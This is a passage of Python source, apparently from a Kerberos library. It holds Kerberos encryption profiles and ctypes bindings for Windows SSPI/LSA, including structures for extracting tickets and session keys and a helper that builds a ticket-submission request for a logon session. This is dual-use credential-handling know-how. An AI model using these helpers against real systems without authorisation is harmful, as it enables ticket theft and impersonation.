            ValueError: if ``params`` is anything but None or an empty string.
        """
        # Accept an empty bytes object as well as the empty str.
        if params not in (None, "", b""):
            raise ValueError("Invalid DES3 string-to-key parameters")
        k = cls.random_to_key(_nfold(string + salt, 21))
        return cls.derive(k, "kerberos".encode())

    @classmethod
    def basic_encrypt(cls, key, plaintext):
        """3DES-CBC encrypt with an all-zero IV; input must be block-aligned."""
        assert len(plaintext) % 8 == 0
        des3 = DES3(key.contents, MODE_CBC, IV=b"\x00" * 8)
        return des3.encrypt(plaintext)

    @classmethod
    def basic_decrypt(cls, key, ciphertext):
        """3DES-CBC decrypt with an all-zero IV; input must be block-aligned."""
        assert len(ciphertext) % 8 == 0
        des3 = DES3(key.contents, MODE_CBC, IV=b"\x00" * 8)
        return des3.decrypt(ciphertext)
class _AESEnctype(_SimplifiedEnctype):
    """Shared AES profile; subclasses supply ``enctype``, ``keysize`` and ``seedsize``."""

    blocksize = 16
    padsize = 1
    macsize = 12
    hashmod = SHA

    @classmethod
    def string_to_key(cls, string, salt, params):
        """Derive a key from ``string`` and ``salt`` with PBKDF2.

        ``params`` is a 4-byte big-endian iteration count; when it is
        falsy the default of 4096 iterations is used.
        """
        (iterations,) = unpack(">L", params or b"\x00\x00\x10\x00")
        seed = PBKDF2(string, salt, iterations, cls.seedsize)
        tkey = cls.random_to_key(seed)
        return cls.derive(tkey, "kerberos".encode())

    @classmethod
    def basic_encrypt(cls, key, plaintext):
        """AES-CBC encrypt with a zero IV; output has the length of the input.

        For inputs longer than one block the last two ciphertext blocks
        are swapped and the (now final) block is truncated to the length
        of the last plaintext block.
        """
        assert len(plaintext) >= 16
        aes = AES(key.contents, MODE_CBC, b"\x00" * 16)
        ctext = aes.encrypt(_zeropad(plaintext, 16))
        if len(plaintext) > 16:
            # Length of the final plaintext block (16 when already aligned).
            lastlen = len(plaintext) % 16 or 16
            ctext = ctext[:-32] + ctext[-16:] + ctext[-32:-16][:lastlen]
        return ctext

    @classmethod
    def basic_decrypt(cls, key, ciphertext):
        """Inverse of ``basic_encrypt``; CBC chaining is done by hand over ECB."""
        assert len(ciphertext) >= 16
        aes = AES(key.contents, MODE_ECB)
        if len(ciphertext) == 16:
            return aes.decrypt(ciphertext)
        cblocks = [ciphertext[p : p + 16] for p in range(0, len(ciphertext), 16)]
        lastlen = len(cblocks[-1])
        prev_cblock = b"\x00" * 16
        plaintext = b""
        # Ordinary CBC decryption for everything but the last two blocks.
        for b in cblocks[:-2]:
            plaintext += _xorbytes(aes.decrypt(b), prev_cblock)
            prev_cblock = b
        # Decrypt the second-to-last block: its head XORed with the final
        # (possibly short) block gives the last plaintext, its tail is the
        # part that was cut off the final block during encryption.
        b = aes.decrypt(cblocks[-2])
        lastplaintext = _xorbytes(b[:lastlen], cblocks[-1])
        omitted = b[lastlen:]
        plaintext += _xorbytes(aes.decrypt(cblocks[-1] + omitted), prev_cblock)
        return plaintext + lastplaintext
class _AES128CTS(_AESEnctype):
    """AES profile with 16-byte keys (``Enctype.AES128``)."""

    enctype = Enctype.AES128
    keysize = 16
    seedsize = 16


class _AES256CTS(_AESEnctype):
    """AES profile with 32-byte keys (``Enctype.AES256``)."""

    enctype = Enctype.AES256
    keysize = 32
    seedsize = 32
class _RC4(_EnctypeProfile):
    """RC4 profile keyed with HMAC-MD5 derived keys."""

    enctype = Enctype.RC4
    keysize = 16
    seedsize = 16

    @staticmethod
    def usage_str(keyusage):
        """Pack the key usage as little-endian uint32, remapping 3 to 8 and 23 to 13."""
        remapped = {3: 8, 23: 13}
        return pack("<I", remapped.get(keyusage, keyusage))

    @classmethod
    def string_to_key(cls, string, salt, params):
        """Key is the MD4 digest of the UTF-16LE password; salt and params are unused."""
        password_utf16 = string.decode("UTF-8").encode("UTF-16LE")
        return Key(cls.enctype, md4(password_utf16).digest())

    @classmethod
    def encrypt(cls, key, keyusage, plaintext, confounder):
        """Return checksum + RC4(confounder + plaintext).

        An 8-byte random confounder is generated when ``confounder`` is None.
        """
        if confounder is None:
            confounder = get_random_bytes(8)
        usage_key = HMAC.new(key.contents, cls.usage_str(keyusage), MD5).digest()
        checksum = HMAC.new(usage_key, confounder + plaintext, MD5).digest()
        # The RC4 key depends on the checksum of the message itself.
        stream_key = HMAC.new(usage_key, checksum, MD5).digest()
        return checksum + ARC4(stream_key).encrypt(confounder + plaintext)

    @classmethod
    def decrypt(cls, key, keyusage, ciphertext):
        """Decrypt and verify ``ciphertext``; return the plaintext without confounder.

        Raises:
            ValueError: if the ciphertext is shorter than 24 bytes.
            InvalidChecksum: if the leading checksum does not match.
        """
        if len(ciphertext) < 24:
            raise ValueError("ciphertext too short")
        checksum = ciphertext[:16]
        body = ciphertext[16:]
        usage_key = HMAC.new(key.contents, cls.usage_str(keyusage), MD5).digest()
        stream_key = HMAC.new(usage_key, checksum, MD5).digest()
        basic_plaintext = ARC4(stream_key).decrypt(body)
        verified = _mac_equal(
            checksum, HMAC.new(usage_key, basic_plaintext, MD5).digest()
        )
        if keyusage == 9 and not verified:
            # Second attempt for key usage 9: verify with usage value 8.
            usage_key = HMAC.new(key.contents, pack("<I", 8), MD5).digest()
            verified = _mac_equal(
                checksum, HMAC.new(usage_key, basic_plaintext, MD5).digest()
            )
        if not verified:
            raise InvalidChecksum("ciphertext integrity failure")
        return basic_plaintext[8:]

    @classmethod
    def prf(cls, key, string):
        """Return the HMAC of ``string`` under ``key`` using ``SHA``."""
        return HMAC.new(key.contents, string, SHA).digest()
class _ChecksumProfile(object):
    """Base class of the checksum profiles; subclasses implement ``checksum``."""

    @classmethod
    def verify(cls, key, keyusage, text, cksum):
        """Recompute the checksum of ``text`` and raise ``InvalidChecksum`` on mismatch."""
        recomputed = cls.checksum(key, keyusage, text)
        if _mac_equal(cksum, recomputed):
            return
        raise InvalidChecksum("checksum verification failure")
class _SimplifiedChecksum(_ChecksumProfile):
    """Checksum built on a ``_SimplifiedEnctype``; subclasses set ``enc`` and ``macsize``."""

    @classmethod
    def checksum(cls, key, keyusage, text):
        """Return the truncated HMAC of ``text`` under the derived checksum key."""
        # Checksum key: derived with the constant usage || 0x99.
        derivation_constant = pack(">IB", keyusage, 0x99)
        kc = cls.enc.derive(key, derivation_constant)
        digest = HMAC.new(kc.contents, text, cls.enc.hashmod).digest()
        return digest[: cls.macsize]

    @classmethod
    def verify(cls, key, keyusage, text, cksum):
        """Verify ``cksum``, first checking that the key type matches ``enc``.

        Raises:
            ValueError: if ``key.enctype`` differs from ``enc.enctype``.
            InvalidChecksum: if the checksum does not match.
        """
        if cls.enc.enctype != key.enctype:
            raise ValueError("Wrong key type for checksum")
        super().verify(key, keyusage, text, cksum)
class _SHA1AES128(_SimplifiedChecksum):
    """12-byte checksum keyed through the ``_AES128CTS`` profile."""

    macsize = 12
    enc = _AES128CTS


class _SHA1AES256(_SimplifiedChecksum):
    """12-byte checksum keyed through the ``_AES256CTS`` profile."""

    macsize = 12
    enc = _AES256CTS


class _SHA1DES3(_SimplifiedChecksum):
    """20-byte checksum keyed through the ``_DES3CBC`` profile."""

    macsize = 20
    enc = _DES3CBC
class _HMACMD5(_ChecksumProfile):
    """HMAC-MD5 checksum for RC4 keys."""

    @classmethod
    def checksum(cls, key, keyusage, text):
        """Return HMAC-MD5, under a signing key, of MD5(usage || text)."""
        signing_key = HMAC.new(key.contents, b"signaturekey\x00", MD5).digest()
        inner_digest = MD5(_RC4.usage_str(keyusage) + text).digest()
        return HMAC.new(signing_key, inner_digest, MD5).digest()

    @classmethod
    def verify(cls, key, keyusage, text, cksum):
        """Verify ``cksum``; only keys of type ``Enctype.RC4`` are accepted.

        Raises:
            ValueError: if ``key`` is not an RC4 key.
            InvalidChecksum: if the checksum does not match.
        """
        if Enctype.RC4 != key.enctype:
            raise ValueError("Wrong key type for checksum")
        super().verify(key, keyusage, text, cksum)
# Maps an ``Enctype`` number to the profile class implementing it.
# Keys are ints and values are classes (``_RC4`` derives from
# ``_EnctypeProfile`` only), hence the broad annotation.
_enctype_table: Dict[int, type] = {
    Enctype.DES_MD5: _DESCBC,
    Enctype.DES3: _DES3CBC,
    Enctype.AES128: _AES128CTS,
    Enctype.AES256: _AES256CTS,
    Enctype.RC4: _RC4,
}
# Maps a ``Cksumtype`` number to the profile class implementing it.
_checksum_table = {
    Cksumtype.SHA1_DES3: _SHA1DES3,
    Cksumtype.SHA1_AES128: _SHA1AES128,
    Cksumtype.SHA1_AES256: _SHA1AES256,
    Cksumtype.HMAC_MD5: _HMACMD5,
    # 0xFFFFFF76 is -138 (Cksumtype.HMAC_MD5) read as an unsigned 32-bit value.
    0xFFFFFF76: _HMACMD5,
}
def _get_enctype_profile(enctype):
    """Return the profile class registered for ``enctype`` or raise ValueError."""
    if enctype in _enctype_table:
        return _enctype_table[enctype]
    raise ValueError("Invalid enctype %d" % enctype)
def _get_checksum_profile(cksumtype):
    """Return the profile class registered for ``cksumtype`` or raise ValueError."""
    if cksumtype in _checksum_table:
        return _checksum_table[cksumtype]
    raise ValueError("Invalid cksumtype %d" % cksumtype)
class Key(object):
    """An encryption key: an enctype number plus the raw key bytes."""

    def __init__(self, enctype: Enctype, contents: bytes):
        """Store the key after checking its length against the enctype's profile.

        Raises:
            ValueError: if the enctype is unknown or the length is wrong.
        """
        expected_size = _get_enctype_profile(enctype).keysize
        if len(contents) != expected_size:
            raise ValueError("Wrong key length")
        self.enctype = enctype
        self.contents = contents
# -- netsecapi.py ----------------------------------------------------
# Aliases mapping Windows-style type names onto ctypes types.
BYTE = c_ubyte
SHORT = c_int16
USHORT = c_uint16
LONG = c_int32
LPVOID = c_void_p
PVOID = LPVOID
DWORD = c_uint32
HANDLE = LPVOID
PHANDLE = POINTER(HANDLE)
LPHANDLE = PHANDLE
NTSTATUS = LONG
PNTSTATUS = POINTER(NTSTATUS)
# Same definition as the USHORT alias a few lines up.
USHORT = c_uint16
ULONG = c_uint32
PULONG = POINTER(ULONG)
LARGE_INTEGER = c_longlong
LPBYTE = POINTER(BYTE)
LPSTR = c_char_p
CHAR = c_char
PCHAR = LPSTR
SEC_CHAR = CHAR
PSEC_CHAR = PCHAR
ERROR_SUCCESS = 0
# NOTE(review): not referenced in the visible part of the file; presumably a
# token buffer size in bytes — confirm at the use site.
maxtoken_size = 2880
class SID:
    """Security identifier parsed from its in-memory binary form."""

    def __init__(self):
        self.Revision = None
        self.SubAuthorityCount = None
        self.IdentifierAuthority = None
        self.SubAuthority = []

    def __str__(self):
        """Render as ``S-1-<authority>-<sub>-...``.

        Authorities of 2**32 and above are written as ``0x`` followed by
        twelve upper-case hex digits.
        """
        if self.IdentifierAuthority < 2**32:
            authority = str(self.IdentifierAuthority)
        else:
            # Six bytes always hex-encode to exactly twelve digits.
            authority = "0x" + self.IdentifierAuthority.to_bytes(6, "big").hex().upper()
        parts = ["S-1-" + authority]
        parts.extend(str(sub) for sub in self.SubAuthority)
        return "-".join(parts)

    @staticmethod
    def from_ptr(ptr):
        """Read a SID from the memory address ``ptr``.

        Args:
            ptr: integer address of the SID, or None.

        Returns:
            The parsed ``SID``, or None when ``ptr`` is None.
        """
        if ptr is None:
            return None
        # 8-byte header: revision, sub-authority count, 6-byte big-endian
        # identifier authority.
        header = string_at(ptr, 8)
        sid = SID()
        sid.Revision = header[0]
        sid.SubAuthorityCount = header[1]
        sid.IdentifierAuthority = int.from_bytes(header[2:8], "big", signed=False)
        # The sub-authorities follow as little-endian 32-bit integers.
        body = string_at(ptr + 8, sid.SubAuthorityCount * 4)
        sid.SubAuthority.extend(
            int.from_bytes(body[offset : offset + 4], "little", signed=False)
            for offset in range(0, len(body), 4)
        )
        return sid
class KERB_PROTOCOL_MESSAGE_TYPE(enum.Enum):
    """Message type numbers for requests to the Kerberos authentication package."""

    KerbDebugRequestMessage = 0
    KerbQueryTicketCacheMessage = 1
    KerbChangeMachinePasswordMessage = 2
    KerbVerifyPacMessage = 3
    KerbRetrieveTicketMessage = 4
    KerbUpdateAddressesMessage = 5
    KerbPurgeTicketCacheMessage = 6
    KerbChangePasswordMessage = 7
    KerbRetrieveEncodedTicketMessage = 8
    KerbDecryptDataMessage = 9
    KerbAddBindingCacheEntryMessage = 10
    KerbSetPasswordMessage = 11
    KerbSetPasswordExMessage = 12
    KerbVerifyCredentialsMessage = 13
    KerbQueryTicketCacheExMessage = 14
    KerbPurgeTicketCacheExMessage = 15
    KerbRefreshSmartcardCredentialsMessage = 16
    KerbAddExtraCredentialsMessage = 17
    KerbQuerySupplementalCredentialsMessage = 18
    KerbTransferCredentialsMessage = 19
    KerbQueryTicketCacheEx2Message = 20
    KerbSubmitTicketMessage = 21
    KerbAddExtraCredentialsExMessage = 22
    KerbQueryKdcProxyCacheMessage = 23
    KerbPurgeKdcProxyCacheMessage = 24
    KerbQueryTicketCacheEx3Message = 25
    KerbCleanupMachinePkinitCredsMessage = 26
    KerbAddBindingCacheEntryExMessage = 27
    KerbQueryBindingCacheMessage = 28
    KerbPurgeBindingCacheMessage = 29
    KerbQueryDomainExtendedPoliciesMessage = 30
    KerbQueryS4U2ProxyCacheMessage = 31
class SEC_E(enum.Enum):
    """Status codes; ``get_tgt`` and ``get_tgs`` compare against OK and CONTINUE_NEEDED."""

    OK = 0x00000000
    CONTINUE_NEEDED = 0x00090312
    INSUFFICIENT_MEMORY = 0x80090300
    INVALID_HANDLE = 0x80090301
    UNSUPPORTED_FUNCTION = 0x80090302
    TARGET_UNKNOWN = 0x80090303
    INTERNAL_ERROR = 0x80090304
    SECPKG_NOT_FOUND = 0x80090305
    NOT_OWNER = 0x80090306
    CANNOT_INSTALL = 0x80090307
    INVALID_TOKEN = 0x80090308
    CANNOT_PACK = 0x80090309
    QOP_NOT_SUPPORTED = 0x8009030A
    NO_IMPERSONATION = 0x8009030B
    LOGON_DENIED = 0x8009030C
    UNKNOWN_CREDENTIALS = 0x8009030D
    NO_CREDENTIALS = 0x8009030E
    MESSAGE_ALTERED = 0x8009030F
    OUT_OF_SEQUENCE = 0x80090310
    NO_AUTHENTICATING_AUTHORITY = 0x80090311
    BAD_PKGID = 0x80090316
    CONTEXT_EXPIRED = 0x80090317
    INCOMPLETE_MESSAGE = 0x80090318
    INCOMPLETE_CREDENTIALS = 0x80090320
    BUFFER_TOO_SMALL = 0x80090321
    WRONG_PRINCIPAL = 0x80090322
    TIME_SKEW = 0x80090324
    UNTRUSTED_ROOT = 0x80090325
    ILLEGAL_MESSAGE = 0x80090326
    CERT_UNKNOWN = 0x80090327
    CERT_EXPIRED = 0x80090328
    ENCRYPT_FAILURE = 0x80090329
    DECRYPT_FAILURE = 0x80090330
    ALGORITHM_MISMATCH = 0x80090331
    SECURITY_QOS_FAILED = 0x80090332
    UNFINISHED_CONTEXT_DELETED = 0x80090333
    NO_TGT_REPLY = 0x80090334
    NO_IP_ADDRESSES = 0x80090335
    WRONG_CREDENTIAL_HANDLE = 0x80090336
    CRYPTO_SYSTEM_INVALID = 0x80090337
    MAX_REFERRALS_EXCEEDED = 0x80090338
    MUST_BE_KDC = 0x80090339
    STRONG_CRYPTO_NOT_SUPPORTED = 0x8009033A
    TOO_MANY_PRINCIPALS = 0x8009033B
    NO_PA_DATA = 0x8009033C
    PKINIT_NAME_MISMATCH = 0x8009033D
    SMARTCARD_LOGON_REQUIRED = 0x8009033E
    SHUTDOWN_IN_PROGRESS = 0x8009033F
    KDC_INVALID_REQUEST = 0x80090340
    KDC_UNABLE_TO_REFER = 0x80090341
    KDC_UNKNOWN_ETYPE = 0x80090342
    UNSUPPORTED_PREAUTH = 0x80090343
    DELEGATION_REQUIRED = 0x80090345
    BAD_BINDINGS = 0x80090346
    MULTIPLE_ACCOUNTS = 0x80090347
    NO_KERB_KEY = 0x80090348
    CERT_WRONG_USAGE = 0x80090349
    DOWNGRADE_DETECTED = 0x80090350
    SMARTCARD_CERT_REVOKED = 0x80090351
    ISSUING_CA_UNTRUSTED = 0x80090352
    REVOCATION_OFFLINE_C = 0x80090353
    PKINIT_CLIENT_FAILURE = 0x80090354
    SMARTCARD_CERT_EXPIRED = 0x80090355
    NO_S4U_PROT_SUPPORT = 0x80090356
    CROSSREALM_DELEGATION_FAILURE = 0x80090357
    REVOCATION_OFFLINE_KDC = 0x80090358
    ISSUING_CA_UNTRUSTED_KDC = 0x80090359
    KDC_CERT_EXPIRED = 0x8009035A
    KDC_CERT_REVOKED = 0x8009035B
    INVALID_PARAMETER = 0x8009035D
    DELEGATION_POLICY = 0x8009035E
    POLICY_NLTM_ONLY = 0x8009035F
    RENEGOTIATE = 590625
    COMPLETE_AND_CONTINUE = 590612
    COMPLETE_NEEDED = 590611
class SECPKG_CRED(enum.IntFlag):
    """SECPKG_CRED_* bit flags, combinable with ``|``.

    ``BOTH`` carries the same value as ``INBOUND | OUTBOUND``.
    NOTE(review): presumably the credential-use values expected by
    AcquireCredentialsHandle's ``cred_usage`` argument; confirm at call sites.
    """

    AUTOLOGON_RESTRICTED = 0x10
    BOTH = 0x3
    INBOUND = 0x1
    OUTBOUND = 0x2
    PROCESS_POLICY_ONLY = 0x20
class ISC_REQ(enum.IntFlag):
    """ISC_REQ_* single-bit flags, written as ``1 << bit`` to show the bit index.

    InitializeSecurityContext combines several of these as the default value
    of its ``flags`` argument and wraps the returned output flags in this type.
    """

    DELEGATE = 1 << 0
    MUTUAL_AUTH = 1 << 1
    REPLAY_DETECT = 1 << 2
    SEQUENCE_DETECT = 1 << 3
    CONFIDENTIALITY = 1 << 4
    USE_SESSION_KEY = 1 << 5
    PROMPT_FOR_CREDS = 1 << 6
    USE_SUPPLIED_CREDS = 1 << 7
    ALLOCATE_MEMORY = 1 << 8
    USE_DCE_STYLE = 1 << 9
    DATAGRAM = 1 << 10
    CONNECTION = 1 << 11
    CALL_LEVEL = 1 << 12
    FRAGMENT_SUPPLIED = 1 << 13
    EXTENDED_ERROR = 1 << 14
    STREAM = 1 << 15
    INTEGRITY = 1 << 16
    IDENTIFY = 1 << 17
    NULL_SESSION = 1 << 18
    MANUAL_CRED_VALIDATION = 1 << 19
    RESERVED1 = 1 << 20
    FRAGMENT_TO_FIT = 1 << 21
    # Bits 22-27 are not defined in this table.
    HTTP = 1 << 28
class SECPKG_ATTR(enum.Enum):
    """SECPKG_ATTR_* attribute identifiers.

    NOTE(review): presumably the values QueryContextAttributes expects for its
    ``attr`` argument (it reads ``attr.value``); confirm at call sites.
    """

    SESSION_KEY = 0x9
    C_ACCESS_TOKEN = 0x80000012
    C_FULL_ACCESS_TOKEN = 0x80000082
    CERT_TRUST_STATUS = 0x80000084
    CREDS = 0x80000080
    CREDS_2 = 0x80000086
    NEGOTIATION_PACKAGE = 0x80000081
    PACKAGE_INFO = 0xA
    SERVER_AUTH_FLAGS = 0x80000083
    SIZES = 0x0
    SUBJECT_SECURITY_ATTRIBUTES = 0x7C
    ENDPOINT_BINDINGS = 0x1A
class SECBUFFER_TYPE(enum.Enum):
    """SECBUFFER_* values stored in ``SecBuffer.BufferType``.

    ``SecBuffer`` writes a member's ``.value`` into the structure and converts
    the stored integer back to a member when the buffer is read.
    """

    SECBUFFER_ALERT = 17
    SECBUFFER_ATTRMASK = 0xF0000000
    SECBUFFER_CHANNEL_BINDINGS = 14
    SECBUFFER_CHANGE_PASS_RESPONSE = 15
    SECBUFFER_DATA = 1
    SECBUFFER_DTLS_MTU = 24
    SECBUFFER_EMPTY = 0
    SECBUFFER_EXTRA = 5
    SECBUFFER_MECHLIST = 11
    SECBUFFER_MECHLIST_SIGNATURE = 12
    SECBUFFER_MISSING = 4
    SECBUFFER_PKG_PARAMS = 3
    SECBUFFER_PRESHARED_KEY = 22
    SECBUFFER_PRESHARED_KEY_IDENTITY = 23
    SECBUFFER_SRTP_MASTER_KEY_IDENTIFIER = 20
    SECBUFFER_SRTP_PROTECTION_PROFILES = 19
    SECBUFFER_STREAM_HEADER = 7
    SECBUFFER_STREAM_TRAILER = 6
    SECBUFFER_TARGET = 13
    SECBUFFER_TARGET_HOST = 16
    SECBUFFER_TOKEN = 2
    SECBUFFER_TOKEN_BINDING = 21
    SECBUFFER_APPLICATION_PROTOCOLS = 18
    SECBUFFER_PADDING = 9
class FILETIME(Structure):
    """Structure of two DWORD members: a low half and a high half."""

    _fields_ = [("dwLowDateTime", DWORD), ("dwHighDateTime", DWORD)]


# Alternative spellings of FILETIME and of its pointer type; the timestamp
# output argument of the SSPI wrappers in this file is declared as PTimeStamp.
TimeStamp = FILETIME
PFILETIME = POINTER(FILETIME)
PTimeStamp = PFILETIME
class SecPkgContext_SessionKey(Structure):
    """Length plus pointer describing a block of session-key bytes."""

    _fields_ = [
        ("SessionKeyLength", ULONG),
        ("SessionKey", LPBYTE),
    ]

    @property
    def Buffer(self):
        """Return a bytes copy of ``SessionKeyLength`` bytes read at ``SessionKey``."""
        key_length = self.SessionKeyLength
        return string_at(self.SessionKey, size=key_length)
class SecHandle(Structure):
    """Handle structure made of two pointer members.

    A new instance points each member at its own freshly created, zero-valued
    ULONG.
    """

    _fields_ = [
        ("dwLower", POINTER(ULONG)),
        ("dwUpper", POINTER(ULONG)),
    ]

    def __init__(self):
        lower = pointer(ULONG())
        upper = pointer(ULONG())
        Structure.__init__(self, lower, upper)
class SecBuffer(Structure):
    """Descriptor of one data buffer: byte count, type code and address.

    The constructor copies ``token`` into a new ctypes buffer and stores that
    buffer's address in ``pvBuffer``.
    """

    _fields_ = [
        ("cbBuffer", ULONG),
        ("BufferType", ULONG),
        ("pvBuffer", PVOID),
    ]

    def __init__(
        self, token=b"\x00" * maxtoken_size, buffer_type=SECBUFFER_TYPE.SECBUFFER_TOKEN
    ):
        """Allocate the backing buffer and fill in the descriptor.

        :param token: initial contents; its length becomes ``cbBuffer``.
        :param buffer_type: ``SECBUFFER_TYPE`` member whose ``.value`` is
            stored in ``BufferType``.
        """
        buf = create_string_buffer(token, size=len(token))
        # Cast the buffer object itself, not byref(buf): casting a ctypes
        # instance records it in the result's keep-alive references, which
        # are carried along when the value is stored in this structure (and
        # when the structure is copied into an array). With byref() nothing
        # referenced the buffer once __init__ returned, leaving pvBuffer
        # pointing at freed memory.
        Structure.__init__(self, sizeof(buf), buffer_type.value, cast(buf, PVOID))
        # Explicit reference as well, so the lifetime of the backing memory
        # is obvious and does not rest on ctypes bookkeeping alone.
        self._token_buffer = buf

    @property
    def Buffer(self):
        """Return ``(SECBUFFER_TYPE member, bytes copy of the buffer contents)``."""
        return (
            SECBUFFER_TYPE(self.BufferType),
            string_at(self.pvBuffer, size=self.cbBuffer),
        )
class SecBufferDesc(Structure):
    """Descriptor for a run of ``SecBuffer`` structures: version, count, pointer."""

    _fields_ = [
        ("ulVersion", ULONG),
        ("cBuffers", ULONG),
        ("pBuffers", POINTER(SecBuffer)),
    ]

    def __init__(self, secbuffers=None):
        """Describe ``secbuffers``, or one default ``SecBuffer()`` when omitted.

        :param secbuffers: sequence of ``SecBuffer`` instances copied into a
            ctypes array, or ``None``.
        """
        if secbuffers is None:
            Structure.__init__(self, 0, 1, pointer(SecBuffer()))
            return
        count = len(secbuffers)
        buffer_array = (SecBuffer * count)(*secbuffers)
        Structure.__init__(self, 0, count, buffer_array)

    def __getitem__(self, index):
        """Return the ``SecBuffer`` at ``index`` (no bounds check against ``cBuffers``)."""
        return self.pBuffers[index]

    @property
    def Buffers(self):
        """Return the ``Buffer`` value of each of the ``cBuffers`` entries, in order."""
        return [self.pBuffers[i].Buffer for i in range(self.cBuffers)]
# Pointer types used in the argtypes declarations of the SSPI wrappers, and
# the credential/context spellings of SecHandle (all the same class).
PSecBufferDesc = POINTER(SecBufferDesc)
PSecHandle = POINTER(SecHandle)
CredHandle = CtxtHandle = SecHandle
PCredHandle = PCtxtHandle = PSecHandle
class LUID(Structure):
    """Identifier stored as a DWORD low part and a LONG high part.

    The helpers convert to and from a single integer in which the high part
    occupies the bits above bit 31.
    """

    _fields_ = [("LowPart", DWORD), ("HighPart", LONG)]

    def to_int(self):
        """Return this identifier as one integer."""
        return LUID.luid_to_int(self)

    @staticmethod
    def luid_to_int(luid):
        """Return ``(HighPart << 32) + LowPart`` for ``luid``."""
        shifted_high = luid.HighPart << 32
        return shifted_high + luid.LowPart

    @staticmethod
    def from_int(i):
        """Build a LUID from integer ``i`` (low 32 bits -> LowPart, rest -> HighPart)."""
        result = LUID()
        result.LowPart = i & 0xFFFFFFFF
        result.HighPart = i >> 32
        return result


PLUID = POINTER(LUID)
class LSA_STRING(Structure):
    """Counted byte string: used length, allocated length and data pointer."""

    _fields_ = [
        ("Length", USHORT),
        ("MaximumLength", USHORT),
        ("Buffer", POINTER(c_char)),
    ]

    def to_string(self):
        """Return the string content decoded with the default codec.

        Only ``Length`` bytes are read. ``MaximumLength`` is the size of the
        allocation, so reading that many bytes (as this method used to) also
        returned the terminator and any unused bytes after the content.
        """
        return string_at(self.Buffer, self.Length).decode()


PLSA_STRING = POINTER(LSA_STRING)
class LSA_UNICODE_STRING(Structure):
    """Counted UTF-16-LE string: used length, allocated length and data pointer.

    Both lengths are byte counts, not character counts.
    """

    _fields_ = [
        ("Length", USHORT),
        ("MaximumLength", USHORT),
        ("Buffer", POINTER(c_char)),
    ]

    @staticmethod
    def from_string(s):
        """Build an instance holding ``s`` encoded as UTF-16-LE.

        The buffer is allocated with a two-byte NUL terminator, so
        ``MaximumLength`` (content + terminator) matches the real allocation
        size. Previously ``MaximumLength`` claimed one byte more than was
        allocated.

        :param s: text to store.
        :returns: new ``LSA_UNICODE_STRING`` that keeps its buffer alive.
        """
        encoded = s.encode("utf-16-le")
        terminated = encoded + b"\x00\x00"
        lus = LSA_UNICODE_STRING()
        lus.Buffer = create_string_buffer(terminated, len(terminated))
        lus.MaximumLength = len(terminated)
        lus.Length = len(encoded)
        return lus

    def to_string(self):
        """Return the content as ``str``.

        Only ``Length`` bytes are decoded; decoding ``MaximumLength`` bytes
        could over-read the buffer and fail on an odd byte count. NUL
        characters are still removed, as before.
        """
        return (
            string_at(self.Buffer, self.Length)
            .decode("utf-16-le")
            .replace("\x00", "")
        )
class KERB_CRYPTO_KEY(Structure):
    """Key descriptor: type code, byte length and address of the key bytes."""

    _fields_ = [("KeyType", LONG), ("Length", ULONG), ("Value", PVOID)]

    def to_dict(self):
        """Return ``{"KeyType": <int>, "Key": <bytes copy of Length bytes at Value>}``."""
        key_type = self.KeyType
        key_bytes = string_at(self.Value, self.Length)
        return {"KeyType": key_type, "Key": key_bytes}
class KERB_EXTERNAL_TICKET(Structure):
    """Ticket record: names, session key, flags, timestamps and encoded ticket.

    The three name members are declared as untyped pointers and are not
    dereferenced by this class.
    """

    _fields_ = [
        # Untyped name pointers.
        ("ServiceName", PVOID),
        ("TargetName", PVOID),
        ("ClientName", PVOID),
        # Counted UTF-16 strings.
        ("DomainName", LSA_UNICODE_STRING),
        ("TargetDomainName", LSA_UNICODE_STRING),
        ("AltTargetDomainName", LSA_UNICODE_STRING),
        ("SessionKey", KERB_CRYPTO_KEY),
        ("TicketFlags", ULONG),
        ("Flags", ULONG),
        # Timestamps and skew as 64-bit integers.
        ("KeyExpirationTime", LARGE_INTEGER),
        ("StartTime", LARGE_INTEGER),
        ("EndTime", LARGE_INTEGER),
        ("RenewUntil", LARGE_INTEGER),
        ("TimeSkew", LARGE_INTEGER),
        # Encoded ticket: byte count and address.
        ("EncodedTicketSize", ULONG),
        ("EncodedTicket", PVOID),
    ]

    def get_data(self):
        """Return ``{"Key": SessionKey.to_dict(), "Ticket": <encoded ticket bytes>}``.

        Both values are copied out of the memory the structure points to, so
        that memory must still be valid when this is called.
        """
        session_key = self.SessionKey.to_dict()
        encoded_ticket = string_at(self.EncodedTicket, self.EncodedTicketSize)
        return {"Key": session_key, "Ticket": encoded_ticket}
class KERB_SUBMIT_TKT_REQUEST(Structure):
    """Fixed-size header of a ticket-submission request."""

    _fields_ = [
        ("MessageType", DWORD),
        ("LogonId", LUID),
        ("TicketFlags", ULONG),
        ("Key", KERB_CRYPTO_KEY),
        ("KerbCredSize", ULONG),
        ("KerbCredOffset", ULONG),
    ]


# Size in bytes of the header above; submit_tkt_helper derives the
# KerbCredOffset it writes from this value.
KERB_SUBMIT_TKT_REQUEST_OFFSET = sizeof(KERB_SUBMIT_TKT_REQUEST)
def submit_tkt_helper(ticket_data, logonid=0):
    """Build a ticket-submission request with ``ticket_data`` appended inline.

    A one-off structure type is declared per call because the trailing
    ``TicketData`` array is sized to ``len(ticket_data)``.

    :param ticket_data: ticket bytes to embed after the header.
    :param logonid: ``LUID`` instance, or an int converted with ``LUID.from_int``.
    :returns: the populated request structure.
    """
    if isinstance(logonid, int):
        logonid = LUID.from_int(logonid)

    ticket_len = len(ticket_data)
    ticket_array_type = c_byte * ticket_len

    class KERB_SUBMIT_TKT_REQUEST(Structure):
        # Local 4-byte-packed variant of the module-level structure, with the
        # key member flattened to Length/Value and the ticket bytes appended.
        _pack_ = 4
        _fields_ = [
            ("MessageType", DWORD),
            ("LogonId", LUID),
            ("TicketFlags", ULONG),
            ("Length", ULONG),
            ("Value", PVOID),
            ("KerbCredSize", ULONG),
            ("KerbCredOffset", ULONG),
            ("TicketData", ticket_array_type),
        ]

    req = KERB_SUBMIT_TKT_REQUEST()
    req.MessageType = KERB_PROTOCOL_MESSAGE_TYPE.KerbSubmitTicketMessage.value
    req.LogonId = logonid
    req.TicketFlags = 0
    # NOTE(review): the local structure declares no "Key" field, so this only
    # sets a plain Python attribute and does not change the structure's bytes.
    req.Key = KERB_CRYPTO_KEY()
    req.KerbCredSize = ticket_len
    req.TicketData = ticket_array_type(*ticket_data)
    # Offset of the ticket bytes: module-level header size minus 4.
    # NOTE(review): the 4-byte correction presumably accounts for the layout
    # difference between the two structure definitions; confirm on target.
    req.KerbCredOffset = KERB_SUBMIT_TKT_REQUEST_OFFSET - 4
